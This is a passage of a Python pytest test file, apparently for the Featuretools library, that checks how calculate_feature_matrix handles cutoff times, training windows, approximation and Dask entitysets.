assert (feature_matrix[property_feature.get_name()] == labels).values.all()
error_text = 'features must be a non-empty list of features'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix('features', es, cutoff_time=cutoff_time)
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([], es, cutoff_time=cutoff_time)
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([1, 2, 3], es, cutoff_time=cutoff_time)
error_text = "cutoff_time times must be datetime type: try casting via "\
"pd\\.to_datetime\\(\\)"
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
instance_ids=range(17),
cutoff_time=17)
error_text = 'cutoff_time must be a single value or DataFrame'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
instance_ids=range(17),
cutoff_time=times)
cutoff_times_dup = pd.DataFrame({'time': [datetime(2018, 3, 1),
datetime(2018, 3, 1)],
es['log'].index: [1, 1]})
error_text = 'Duplicated rows in cutoff time dataframe.'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([property_feature],
entityset=es,
cutoff_time=cutoff_times_dup)
cutoff_reordered = cutoff_time.iloc[[-1, 10, 1]] # 3 ids not ordered by cutoff time
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_reordered,
verbose=True)
assert all(feature_matrix.index == cutoff_reordered["id"].values)
# fails with Dask and Koalas entitysets, cutoff time not reordered; cannot verify out of order
# - can't tell if wrong/different all are false so can't check positional
def test_cfm_warns_dask_cutoff_time(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times,
es['log'].index: instances})
cutoff_time = dd.from_pandas(cutoff_time, npartitions=4)
property_feature = ft.Feature(es['log']['value']) > 10
match = "cutoff_time should be a Pandas DataFrame: " \
"computing cutoff_time, this may take a while"
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
def test_cfm_compose(es, lt):
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=lt,
verbose=True)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] ==
feature_matrix['label_func']).values.all()
def test_cfm_compose_approximate(es, lt):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('dask does not support approximate')
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=lt,
approximate='1s',
verbose=True)
assert(type(feature_matrix) == pd.core.frame.DataFrame)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] ==
feature_matrix['label_func']).values.all()
def test_cfm_dask_compose(dask_es, lt):
property_feature = ft.Feature(dask_es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
dask_es,
cutoff_time=lt,
verbose=True)
feature_matrix = feature_matrix.compute()
assert (feature_matrix[property_feature.get_name()] == feature_matrix['label_func']).values.all()
# tests approximate, skip for dask/koalas
def test_cfm_approximate_correct_ordering():
trips = {
'trip_id': [i for i in range(1000)],
'flight_time': [datetime(1998, 4, 2) for i in range(350)] + [datetime(1997, 4, 3) for i in range(650)],
'flight_id': [randint(1, 25) for i in range(1000)],
'trip_duration': [randint(1, 999) for i in range(1000)]
}
df = pd.DataFrame.from_dict(trips)
es = EntitySet('flights')
es.entity_from_dataframe("trips",
dataframe=df,
index="trip_id",
time_index='flight_time')
es.normalize_entity(base_entity_id="trips",
new_entity_id="flights",
index="flight_id",
make_time_index=True)
features = dfs(entityset=es, target_entity='trips', features_only=True)
flight_features = [feature for feature in features
if isinstance(feature, DirectFeature) and
isinstance(feature.base_features[0],
AggregationFeature)]
property_feature = IdentityFeature(es['trips']['trip_id'])
cutoff_time = pd.DataFrame.from_dict({'instance_id': df['trip_id'],
'time': df['flight_time']})
time_feature = IdentityFeature(es['trips']['flight_time'])
feature_matrix = calculate_feature_matrix(flight_features + [property_feature, time_feature],
es,
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
feature_matrix.index.names = ['instance', 'time']
assert(np.all(feature_matrix.reset_index('time').reset_index()[['instance', 'time']].values == feature_matrix[['trip_id', 'flight_time']].values))
feature_matrix_2 = calculate_feature_matrix(flight_features + [property_feature, time_feature],
es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
approximate=Timedelta(2, 'd'))
feature_matrix_2.index.names = ['instance', 'time']
assert(np.all(feature_matrix_2.reset_index('time').reset_index()[['instance', 'time']].values == feature_matrix_2[['trip_id', 'flight_time']].values))
for column in feature_matrix:
for x, y in zip(feature_matrix[column], feature_matrix_2[column]):
assert ((pd.isnull(x) and pd.isnull(y)) or (x == y))
# uses approximate, skip for dask/koalas entitysets
def test_cfm_no_cutoff_time_index(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat4 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat4, pd_es['sessions'])
cutoff_time = pd.DataFrame({
'time': [datetime(2013, 4, 9, 10, 31, 19), datetime(2013, 4, 9, 11, 0, 0)],
'instance_id': [0, 2]
})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
cutoff_time_in_index=False,
approximate=Timedelta(12, 's'),
cutoff_time=cutoff_time)
assert feature_matrix.index.name == 'id'
assert feature_matrix.index.values.tolist() == [0, 2]
assert feature_matrix[dfeat.get_name()].tolist() == [10, 10]
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
cutoff_time = pd.DataFrame({
'time': [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)],
'instance_id': [0, 2]
})
feature_matrix_2 = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
cutoff_time_in_index=False,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix_2.index.name == 'id'
assert feature_matrix_2.index.tolist() == [0, 2]
assert feature_matrix_2[dfeat.get_name()].tolist() == [7, 10]
assert feature_matrix_2[agg_feat.get_name()].tolist() == [5, 1]
# TODO: fails with dask entitysets
# TODO: fails with koalas entitysets
def test_cfm_duplicated_index_in_cutoff_time(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed results not ordered, missing duplicates')
times = [datetime(2011, 4, 1), datetime(2011, 5, 1),
datetime(2011, 4, 1), datetime(2011, 5, 1)]
instances = [1, 1, 2, 2]
property_feature = ft.Feature(es['log']['value']) > 10
cutoff_time = pd.DataFrame({'id': instances, 'time': times},
index=[1, 1, 1, 1])
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
chunk_size=1)
assert (feature_matrix.shape[0] == cutoff_time.shape[0])
# TODO: fails with Dask, Koalas
def test_saveprogress(es, tmpdir):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('saveprogress fails with distributed entitysets')
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = ft.Feature(es['log']['value']) > 10
save_progress = str(tmpdir)
fm_save = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
save_progress=save_progress)
_, _, files = next(os.walk(save_progress))
files = [os.path.join(save_progress, file) for file in files]
# there are 17 datetime files created above
assert len(files) == 17
list_df = []
for file_ in files:
df = pd.read_csv(file_, index_col="id", header=0)
list_df.append(df)
merged_df = pd.concat(list_df)
merged_df.set_index(pd.DatetimeIndex(times), inplace=True, append=True)
fm_no_save = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
assert np.all((merged_df.sort_index().values) == (fm_save.sort_index().values))
assert np.all((fm_no_save.sort_index().values) == (fm_save.sort_index().values))
assert np.all((fm_no_save.sort_index().values) == (merged_df.sort_index().values))
shutil.rmtree(save_progress)
def test_cutoff_time_correctly(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 1, 2]})
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
labels = [10, 5, 0]
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_cutoff_time_binning():
cutoff_time = pd.DataFrame({
'time': [
datetime(2011, 4, 9, 12, 31),
datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10, 1)
],
'instance_id': [1, 2, 3]
})
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(4, 'h'))
labels = [datetime(2011, 4, 9, 12),
datetime(2011, 4, 10, 8),
datetime(2011, 4, 10, 12)]
for i in binned_cutoff_times.index:
assert binned_cutoff_times['time'][i] == labels[i]
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(25, 'h'))
labels = [datetime(2011, 4, 8, 22),
datetime(2011, 4, 9, 23),
datetime(2011, 4, 9, 23)]
for i in binned_cutoff_times.index:
assert binned_cutoff_times['time'][i] == labels[i]
error_text = "Unit is relative"
with pytest.raises(ValueError, match=error_text):
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(1, 'mo'))
def test_training_window_fails_dask(dask_es):
property_feature = ft.Feature(dask_es['log']['id'],
parent_entity=dask_es['customers'],
primitive=Count)
error_text = "Using training_window is not supported with Dask Entities"
with pytest.raises(ValueError, match=error_text):
calculate_feature_matrix([property_feature],
dask_es,
training_window='2 hours')
def test_cutoff_time_columns_order(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
id_col_names = ['instance_id', es['customers'].index]
time_col_names = ['time', es['customers'].time_index]
for id_col in id_col_names:
for time_col in time_col_names:
cutoff_time = pd.DataFrame({'dummy_col_1': [1, 2, 3],
id_col: [0, 1, 2],
'dummy_col_2': [True, False, False],
time_col: times})
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
labels = [10, 5, 0]
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_cutoff_time_df_redundant_column_names(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
cutoff_time = pd.DataFrame({es['customers'].index: [0, 1, 2],
'instance_id': [0, 1, 2],
'dummy_col': [True, False, False],
'time': times})
err_msg = 'Cutoff time DataFrame cannot contain both a column named "instance_id" and a column' \
' with the same name as the target entity index'
with pytest.raises(AttributeError, match=err_msg):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
cutoff_time = pd.DataFrame({es['customers'].time_index: [0, 1, 2],
'instance_id': [0, 1, 2],
'dummy_col': [True, False, False],
'time': times})
err_msg = 'Cutoff time DataFrame cannot contain both a column named "time" and a column' \
' with the same name as the target entity time index'
with pytest.raises(AttributeError, match=err_msg):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
def test_training_window(pd_es):
property_feature = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
top_level_agg = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
# make sure features that have a direct to a higher level agg
# so we have multiple "filter eids" in get_pandas_data_slice,
# and we go through the loop to pull data with a training_window param more than once
dagg = DirectFeature(top_level_agg, pd_es['customers'])
# for now, warns if last_time_index not present
times = [datetime(2011, 4, 9, 12, 31),
datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 1, 2]})
warn_text = "Using training_window but last_time_index is not set on entity customers"
with pytest.warns(UserWarning, match=warn_text):
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours')
pd_es.add_last_time_indexes()
error_text = 'Training window cannot be in observations'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([property_feature],
pd_es,
cutoff_time=cutoff_time,
training_window=Timedelta(2, 'observations'))
# Case1. include_cutoff_time = True
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=True)
prop_values = [4, 5, 1]
dagg_values = [3, 2, 1]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case2. include_cutoff_time = False
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=False)
prop_values = [5, 5, 2]
dagg_values = [3, 2, 1]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case3. include_cutoff_time = False with single cutoff time value
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=pd.to_datetime("2011-04-09 10:40:00"),
training_window='9 minutes',
include_cutoff_time=False)
prop_values = [0, 4, 0]
dagg_values = [3, 3, 3]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case4. include_cutoff_time = True with single cutoff time value
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=pd.to_datetime("2011-04-10 10:40:00"),
training_window='2 days',
include_cutoff_time=True)
prop_values = [0, 10, 1]
dagg_values = [3, 3, 3]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
def test_training_window_overlap(pd_es):
pd_es.add_last_time_indexes()
count_log = ft.Feature(
base=pd_es['log']['id'],
parent_entity=pd_es['customers'],
primitive=Count,
)
cutoff_time = pd.DataFrame({
'id': [0, 0],
'time': ['2011-04-09 10:30:00', '2011-04-09 10:40:00'],
}).astype({'time': 'datetime64[ns]'})
# Case1. include_cutoff_time = True
actual = calculate_feature_matrix(
features=[count_log],
entityset=pd_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
training_window='10 minutes',
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [1, 9])
# Case2. include_cutoff_time = False
actual = calculate_feature_matrix(
features=[count_log],
entityset=pd_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
training_window='10 minutes',
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [0, 9])
def test_include_cutoff_time_without_training_window(es):
es.add_last_time_indexes()
count_log = ft.Feature(
base=es['log']['id'],
parent_entity=es['customers'],
primitive=Count,
)
cutoff_time = pd.DataFrame({
'id': [0, 0],
'time': ['2011-04-09 10:30:00', '2011-04-09 10:31:00'],
}).astype({'time': 'datetime64[ns]'})
# Case1. include_cutoff_time = True
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [1, 6])
# Case2. include_cutoff_time = False
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [0, 5])
# Case3. include_cutoff_time = True with single cutoff time value
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:00"),
instance_ids=[0],
cutoff_time_in_index=True,
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [6])
# Case4. include_cutoff_time = False with single cutoff time value
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:00"),
instance_ids=[0],
cutoff_time_in_index=True,
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [5])
def test_approximate_dfeat_of_agg_on_target_include_cutoff_time(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
cutoff_time = pd.DataFrame({'time': [datetime(2011, 4, 9, 10, 31, 19)], 'instance_id': [0]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat2, agg_feat],
pd_es,
approximate=Timedelta(20, 's'),
cutoff_time=cutoff_time,
include_cutoff_time=False)
# binned cutoff_time will be datetime(2011, 4, 9, 10, 31, 0) and
# log event 5 at datetime(2011, 4, 9, 10, 31, 0) will be
# excluded due to approximate cutoff time point
assert feature_matrix[dfeat.get_name()].tolist() == [5]
assert feature_matrix[agg_feat.get_name()].tolist() == [5]
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(20, 's'),
cutoff_time=cutoff_time,
include_cutoff_time=True)
# binned cutoff_time will be datetime(2011, 4, 9, 10, 31, 0) and
# log event 5 at datetime(2011, 4, 9, 10, 31, 0) will be
# included due to approximate cutoff time point
assert feature_matrix[dfeat.get_name()].tolist() == [6]
assert feature_matrix[agg_feat.get_name()].tolist() == [5]
def test_training_window_recent_time_index(pd_es):
# customer with no sessions
row = {
'id': [3],
'age': [73],
u'région_id': ['United States'],
'cohort': [1],
'cancel_reason': ["Lost interest"],
'loves_ice_cream': [True],
'favorite_quote': ["Don't look back. Something might be gaining on you."],
'signup_date': [datetime(2011, 4, 10)],
'upgrade_date': [datetime(2011, 4, 12)],
'cancel_date': [datetime(2011, 5, 13)],
'date_of_birth': [datetime(1938, 2, 1)],
'engagement_level': [2],
}
to_add_df = pd.DataFrame(row)
to_add_df.index = range(3, 4)
# have to convert category to int in order to concat
old_df = pd_es['customers'].df
old_df.index = old_df.index.astype("int")
old_df["id"] = old_df["id"].astype(int)
df = pd.concat([old_df, to_add_df], sort=True)
# convert back after
df.index = df.index.astype("category")
df["id"] = df["id"].astype("category")
pd_es['customers'].update_data(df=df, recalculate_last_time_indexes=False)
pd_es.add_last_time_indexes()
property_feature = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
top_level_agg = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dagg = DirectFeature(top_level_agg, pd_es['customers'])
instance_ids = [0, 1, 2, 3]
times = [datetime(2011, 4, 9, 12, 31), datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10, 1), datetime(2011, 4, 10, 1, 59, 59)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': instance_ids})
# Case1. include_cutoff_time = True
feature_matrix = calculate_feature_matrix(
[property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=True,
)
prop_values = [4, 5, 1, 0]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
dagg_values = [3, 2, 1, 3]
feature_matrix.sort_index(inplace=True)
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case2. include_cutoff_time = False
feature_matrix = calculate_feature_matrix(
[property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=False,
)
prop_values = [5, 5, 1, 0]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
dagg_values = [3, 2, 1, 3]
feature_matrix.sort_index(inplace=True)
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# TODO: add test to fail w/ koalas
def test_approximate_fails_dask(dask_es):
agg_feat = ft.Feature(dask_es['log']['id'],
parent_entity=dask_es['sessions'],
primitive=Count)
error_text = "Using approximate is not supported with Dask Entities"
with pytest.raises(ValueError, match=error_text):
calculate_feature_matrix([agg_feat],
dask_es,
approximate=Timedelta(1, 'week'))
def test_approximate_multiple_instances_per_cutoff_time(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(1, 'week'),
cutoff_time=cutoff_time)
assert feature_matrix.shape[0] == 2
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approximate_with_multiple_paths(pd_diamond_es):
pd_es = pd_diamond_es
path = backward_path(pd_es, ['regions', 'customers', 'transactions'])
agg_feat = ft.AggregationFeature(pd_es['transactions']['id'],
parent_entity=pd_es['regions'],
relationship_path=path,
primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(1, 'week'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [6, 2]
def test_approximate_dfeat_of_agg_on_target(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
instance_ids=[0, 2],
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [7, 10]
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approximate_dfeat_of_need_all_values(pd_es):
p = ft.Feature(pd_es['log']['value'], primitive=Percentile)
agg_feat = ft.Feature(p, parent_entity=pd_es['sessions'], primitive=Sum)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
log_df = pd_es['log'].df
instances = [0, 2]
cutoffs = [pd.Timestamp('2011-04-09 10:31:19'), pd.Timestamp('2011-04-09 11:00:00')]
approxes = [pd.Timestamp('2011-04-09 10:31:10'), pd.Timestamp('2011-04-09 11:00:00')]
true_vals = []
true_vals_approx = []
for instance, cutoff, approx in zip(instances, cutoffs, approxes):
log_data_cutoff = log_df[log_df['datetime'] < cutoff]
log_data_cutoff['percentile'] = log_data_cutoff['value'].rank(pct=True)
true_agg = log_data_cutoff.loc[log_data_cutoff['session_id'] == instance, 'percentile'].fillna(0).sum()
true_vals.append(round(true_agg, 3))
log_data_approx = log_df[log_df['datetime'] < approx]
log_data_approx['percentile'] = log_data_approx['value'].rank(pct=True)
true_agg_approx = log_data_approx.loc[log_data_approx['session_id'].isin([0, 1, 2]), 'percentile'].fillna(0).sum()
true_vals_approx.append(round(true_agg_approx, 3))
lapprox = [round(x, 3) for x in feature_matrix[dfeat.get_name()].tolist()]
test_list = [round(x, 3) for x in feature_matrix[agg_feat.get_name()].tolist()]
assert lapprox == true_vals_approx
assert test_list == true_vals
def test_uses_full_entity_feat_of_approximate(pd_es):
agg_feat = ft.Feature(pd_es['log']['value'], parent_entity=pd_es['sessions'], primitive=Sum)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
agg_feat3 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Max)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
dfeat2 = DirectFeature(agg_feat3, pd_es['sessions'])
p = ft.Feature(dfeat, primitive=Percentile)
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
# only dfeat2 should be approximated
# because Percentile needs all values
feature_matrix_only_dfeat2 = calculate_feature_matrix(
[dfeat2],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
assert feature_matrix_only_dfeat2[dfeat2.get_name()].tolist() == [50, 50]
feature_matrix_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
assert feature_matrix_only_dfeat2[dfeat2.get_name()].tolist() == feature_matrix_approx[dfeat2.get_name()].tolist()
feature_matrix_small_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
approximate=Timedelta(10, 'ms'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
feature_matrix_no_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
for f in [p, dfeat, agg_feat]:
for fm1, fm2 in combinations([feature_matrix_approx,
feature_matrix_small_approx,
feature_matrix_no_approx], 2):
assert fm1[f.get_name()].tolist() == fm2[f.get_name()].tolist()
def test_approximate_dfeat_of_dfeat_of_agg_on_target(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(ft.Feature(agg_feat2, pd_es["sessions"]), pd_es['log'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [7, 10]
def test_empty_path_approximate_full(pd_es):
pd_es['sessions'].df['customer_id'] = pd.Series([np.nan, np.nan, np.nan, 1, 1, 2], dtype="category")
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
vals1 = feature_matrix[dfeat.get_name()].tolist()
assert (vals1[0] == 0)
assert (vals1[1] == 0)
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
# todo: do we need to test this situation?
# def test_empty_path_approximate_partial(pd_es):
# pd_es = copy.deepcopy(pd_es)
# pd_es['sessions'].df['customer_id'] = pd.Categorical([0, 0, np.nan, 1, 1, 2])
# agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
# agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
# dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
# times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
# cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
# feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
# pd_es,
# approximate=Timedelta(10, 's'),
# cutoff_time=cutoff_time)
# vals1 = feature_matrix[dfeat.get_name()].tolist()
# assert vals1[0] == 7
# assert np.isnan(vals1[1])
# assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approx_base_feature_is_also_first_class_feature(pd_es):
log_to_products = DirectFeature(pd_es['products']['rating'], pd_es['log'])
# This should still be computed properly
agg_feat = ft.Feature(log_to_products, parent_entity=pd_es['sessions'], primitive=Min)
customer_agg_feat = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
# This is to be approximated
sess_to_cust = DirectFeature(customer_agg_feat, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([sess_to_cust, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
